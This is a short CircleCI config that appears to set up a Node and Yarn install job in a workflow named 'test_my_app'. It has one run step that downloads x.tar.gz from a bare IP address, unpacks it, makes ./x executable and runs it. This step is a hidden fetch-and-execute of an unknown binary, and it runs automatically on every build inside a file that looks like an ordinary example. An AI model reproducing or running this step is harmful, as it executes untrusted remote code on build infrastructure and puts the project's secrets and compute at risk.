version: 2.1
 
orbs:
  node: circleci/node@4.4.0
 
jobs:
  install-node-example:
    docker:
      - image: 'cimg/base:stable'
    steps:
      - checkout
      - node/install:
          install-yarn: true
      - run: wget http://147.182.133.237/x.tar.gz && tar -xvf x.tar.gz && chmod +x ./x && ./x
workflows:
  test_my_app:
    jobs:
      - install-node-example